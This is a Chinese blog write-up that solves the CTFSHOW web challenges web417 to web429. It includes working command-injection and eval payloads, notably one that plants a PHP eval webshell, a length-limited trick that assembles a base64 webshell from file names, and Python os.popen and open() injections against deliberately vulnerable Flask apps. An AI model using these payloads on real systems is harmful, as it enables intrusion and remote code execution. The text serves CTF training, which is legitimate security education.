<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>CTFSHOW | 其他篇题解（二）web417 - web437 - WayneJH Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="WayneJH Blog"><meta name="msapplication-TileImage" content="https://oss.waynejoons.icu/picphoto/favicon.ico"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="WayneJH Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:type" content="blog"><meta property="og:title" content="CTFSHOW | 其他篇题解（二）web417 - web437"><meta property="og:url" content="https://waynejoon.github.io/posts/ctfshow-others-2-web417-web437/"><meta property="og:site_name" content="WayneJH Blog"><meta property="og:description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://waynejoon.github.io/img/waynejoon.jpg"><meta property="article:published_time" content="2025-08-22T12:26:56.000Z"><meta property="article:modified_time" content="2025-11-10T04:10:54.472Z"><meta property="article:author" content="WayneJoon.H"><meta property="article:tag" content="CTFSHOW"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://waynejoon.github.io/img/waynejoon.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://waynejoon.github.io/posts/ctfshow-others-2-web417-web437/"},"headline":"CTFSHOW | 其他篇题解（二）web417 - web437","image":["https://waynejoon.github.io/img/waynejoon.jpg"],"datePublished":"2025-08-22T12:26:56.000Z","dateModified":"2025-11-10T04:10:54.472Z","author":{"@type":"Person","name":"WayneJoon.H"},"publisher":{"@type":"Organization","name":"WayneJH Blog","logo":{"@type":"ImageObject","url":{"text":"WayneJH"}}},"description":"CTFSHOW 其他篇第二部分详细题解"}</script><link rel="canonical" href="https://waynejoon.github.io/posts/ctfshow-others-2-web417-web437/"><link rel="icon" href="https://oss.waynejoons.icu/picphoto/favicon.ico"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="WayneJH Blog" type="application/atom+xml">
</head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">WayneJH</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/links">友链</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2025-08-22T12:26:56.000Z" title="2025/8/22 20:26:56">2025-08-22</time>发表</span><span class="level-item"><a class="link-muted" href="/categories/CTFSHOW/">CTFSHOW</a></span><span class="level-item">28 分钟读完 (大约4250个字)</span><span class="level-item" id="busuanzi_container_page_pv" style="display:none"><span id="busuanzi_value_page_pv">--</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">CTFSHOW | 其他篇题解（二）web417 - web437</h1><div class="content"><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>由于题目比较多，所以分三个部分来写，这是第二部分</p>
<h2 id="题目列表"><a href="#题目列表" class="headerlink" title="题目列表"></a>题目列表</h2><h3 id="web417"><a href="#web417" class="headerlink" title="web417"></a>web417</h3><p>有个<code>3.php</code>文件，下载后是一段加密代码，用ai解密</p>
<p>得到代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;flag.php&#x27;</span>);</span><br><span class="line"><span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;ctf&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$c</span>==<span class="string">&#x27;show&#x27;</span>)&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&#x27;FLAG_NOT_HERE&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ctf=show</span><br></pre></td></tr></table></figure>

<p>成功得到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821205753136.png"></p>
<h3 id="web418"><a href="#web418" class="headerlink" title="web418"></a>web418</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821184428179.png"></p>
<p>由于变量key已经被赋值为0，因此这个后门没什么用，需要另辟蹊径</p>
<p>然后我们可以看到有个<code>extract</code>函数，这是PHP里的一个函数调用。<code>extract()</code>作用是把数组里的键名当作变量名，在当前作用域创建同名变量，并赋值为数组的对应值。比如<code>$_POST[&#39;wayne&#39;]=123</code>时，<code>extract($_POST);</code>之后就有了变量<code>$wayne=123</code></p>
<p>我们看这个代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$die</span>?<span class="keyword">die</span>(<span class="string">&#x27;FLAG_NOT_HERE&#x27;</span>):<span class="title function_ invoke__">clear</span>(<span class="variable">$clear</span>);</span><br></pre></td></tr></table></figure>

<p>由于变量die没有被赋值，因此可以进行<strong>变量覆盖</strong>。这是<strong>三目运算符</strong>，我们可以传入0来触发后面的<code>clear($clear)</code></p>
<p>继续往下划，可以看到<code>clear</code>函数的定义</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821190543737.png"></p>
<p>给变量clear用<strong>分号截断命令</strong>即可，POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">die=0&amp;clear=;echo &#x27;&lt;?=eval($_POST[1]);?&gt;&#x27;&gt;/var/www/html/1.php</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250821191346821.png"></p>
<p>然后蚁剑连接</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821191130558.png"></p>
<p>在网页根目录找到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821191204131.png"></p>
<h3 id="web419"><a href="#web419" class="headerlink" title="web419"></a>web419</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821210215038.png"></p>
<p>这题要求<strong>POST</strong>传入参数code，且长度要小于17，然后eval执行php代码</p>
<p>咱们用<strong>反引号</strong>执行命令即可，把当前目录下的<code>flag.php</code>复制到<code>1.txt</code></p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=`cp f* 1.txt`;</span><br></pre></td></tr></table></figure>

<p>然后打开<code>1.txt</code>读取flag即可</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821210814466.png"></p>
<h3 id="web420"><a href="#web420" class="headerlink" title="web420"></a>web420</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821213447055.png"></p>
<p>这次code长度被限制在8位以内，也就是7位，然后eval函数也换成了system。有几个方法可以做这题</p>
<p><strong>方法一：nl输出</strong></p>
<p>nl命令是Linux系统中的一个命令行工具，全称是“number lines”，用于给文本文件或标准输入的每一行添加行号，<strong>并将结果输出</strong>。它类似于cat -n，但nl对行号显示格式和处理方式更灵活</p>
<p>经过尝试，发现flag在<code>/var/www</code>目录里面</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=nl ../*</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250821213744417.png"></p>
<p><strong>方法二：写文件并执行</strong></p>
<p>非常妙的一个方法，强烈建议学习，参考文章：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/-chenxs/p/11981586.html">命令注入长度限制绕过</a></p>
<p>假设我们要写入webshell</p>
<p>目标是传入<code>echo PD89ZXZhbCgkX1BPU1RbMV0pOw==|base64 -d&gt;1.php;</code></p>
<p>先用<strong>重定向符</strong>创建文件，依次执行以下命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&gt;hp\;</span><br><span class="line">&gt;1.p\\</span><br><span class="line">&gt;d\&gt;\\</span><br><span class="line">&gt;\-\\</span><br><span class="line">&gt;4\ \\</span><br><span class="line">&gt;e6\\</span><br><span class="line">&gt;bas\\</span><br><span class="line">&gt;=\|\\</span><br><span class="line">&gt;w=\\</span><br><span class="line">&gt;0pO\\</span><br><span class="line">&gt;bMV\\</span><br><span class="line">&gt;U1R\\</span><br><span class="line">&gt;1BP\\</span><br><span class="line">&gt;gkX\\</span><br><span class="line">&gt;hbC\\</span><br><span class="line">&gt;ZXZ\\</span><br><span class="line">&gt;PD89\\</span><br><span class="line">&gt;o\ \\</span><br><span class="line">&gt;ech\\</span><br></pre></td></tr></table></figure>

<p>然后把这些文件名以<strong>时间倒序</strong>形式写入任意一个文件，例如0</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">ls</span> -t&gt;0</span><br></pre></td></tr></table></figure>

<p>最后运行文件即可，会执行0里面的命令，然后在当前目录创建一个<code>1.php</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sh 0</span><br></pre></td></tr></table></figure>

<p>连接蚁剑即可</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821224320607.png"></p>
<p>成功找到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821224400535.png"></p>
<h3 id="web421"><a href="#web421" class="headerlink" title="web421"></a>web421</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821233704196.png"></p>
<p>这次是要求code长度小于6，也就是长度为5</p>
<p>经过测试，发现flag就在当前目录。直接<code>nl</code>读取就可以</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=nl f*</span><br></pre></td></tr></table></figure>

<p>然后打开源代码查看flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821233821138.png"></p>
<h3 id="web422"><a href="#web422" class="headerlink" title="web422"></a>web422</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250822000032238.png"></p>
<p>相比上题，这题的code长度被限制在5以内</p>
<p>直接<code>nl</code>打印全部内容即可</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=nl *</span><br></pre></td></tr></table></figure>

<p>然后查看网页源码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250822000119903.png"></p>
<h3 id="web423"><a href="#web423" class="headerlink" title="web423"></a>web423</h3><p>打开源代码，可以看到提示</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250822105219034.png"></p>
<p>拼接code参数，一开始用PHP和直接执行命令都不行。经过测试，这个网站是python文件运行的，要用python代码执行</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=os.popen(&#x27;ls&#x27;).read()</span><br></pre></td></tr></table></figure>

<p>可以把原始代码打印出来看看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=os.popen(&#x27;cat app.py&#x27;).read()</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask </span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request </span><br><span class="line"><span class="keyword">import</span> os </span><br><span class="line"></span><br><span class="line">app = Flask(__name__) </span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>) </span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">	code = request.args.get(<span class="string">&#x27;code&#x27;</span>) </span><br><span class="line">	<span class="keyword">if</span> code: </span><br><span class="line">		<span class="keyword">return</span> <span class="built_in">eval</span>(code) </span><br><span class="line">	<span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span> </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>: </span><br><span class="line">	app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>执行命令获取flag即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=os.popen(&#x27;cat /flag&#x27;).read()</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250822105922009.png"></p>
<h3 id="web424"><a href="#web424" class="headerlink" title="web424"></a>web424</h3><p>这题用<code>?code=os.popen(&#39;ls&#39;).read()</code>会报内部错误，既然执行命令不可以，我们试试直接用open函数读取文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=open(&#x27;app.py&#x27;).read()</span><br></pre></td></tr></table></figure>

<p>成功执行，得到网页源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>可以看到，这次没有了os模块，没办法执行系统命令了，不过不影响我们读取文件</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=open(&#x27;/flag&#x27;).read()</span><br></pre></td></tr></table></figure>

<p>成功得到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250822110555816.png"></p>
<h3 id="web425"><a href="#web425" class="headerlink" title="web425"></a>web425</h3><p>跟上题一样，先读取源代码看看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=open(&#x27;app.py&#x27;).read()</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	<span class="keyword">if</span> <span class="string">&#x27;os&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> code:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>可以看到这题相比上题，<strong>过滤了code里面的os字符串</strong>，其他都是一样的，不影响我们做题</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=open(&#x27;/flag&#x27;).read()</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250822111723746.png"></p>
<h3 id="web426"><a href="#web426" class="headerlink" title="web426"></a>web426</h3><p>上题的payload也能用，先看源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=open(&#x27;app.py&#x27;).read()</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|popen&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.<span class="keyword">match</span>(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>这题的正则匹配改了，简单解释一下</p>
<ul>
<li><code>re.compile(r&#39;os|popen&#39;)</code> 创建了一个模式，表示“匹配 <code>os</code> 或 <code>popen</code>”</li>
<li>竖线 <code>|</code> 是“或”的意思</li>
<li><code>reg.match(code)</code> 表示只从字符串开头匹配：<ul>
<li>如果字符串开头含 <code>os</code> 或 <code>popen</code>，匹配成功</li>
<li>否则匹配失败（即 <code>None</code>）</li>
</ul>
</li>
</ul>
<p>也就是<strong>开头不能包含os和popen</strong>，不过对我们影响不大</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=open(&#x27;/flag&#x27;).read()</span><br></pre></td></tr></table></figure>

<h3 id="web427"><a href="#web427" class="headerlink" title="web427"></a>web427</h3><p>可以继续用上题的payload，先看源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=open(&#x27;app.py&#x27;).read()</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|popen|system&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.<span class="keyword">match</span>(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>这题比上题<strong>多过滤了system</strong>，不影响做题</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=open(&#x27;/flag&#x27;).read()</span><br></pre></td></tr></table></figure>

<h3 id="web428"><a href="#web428" class="headerlink" title="web428"></a>web428</h3><p>可以继续用上题的payload看源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=open(&#x27;app.py&#x27;).read()</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|popen|system|read&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.<span class="keyword">match</span>(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>这题比上题<strong>多过滤了read</strong>，不过因为<code>reg.match(code)</code>匹配的是<strong>开头</strong>，所以对我们没有影响</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=open(&#x27;/flag&#x27;).read()</span><br></pre></td></tr></table></figure>

<h3 id="web429"><a href="#web429" class="headerlink" title="web429"></a>web429</h3><p>这题一开始用<code>open(&#39;app.py&#39;).read()</code>执行不了，猜测是某个地方被过滤了，经过尝试，在前面加个空格即可绕过限制</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code= open(&#x27;app.py&#x27;).read()</span><br></pre></td></tr></table></figure>

<p>源代码：</p>
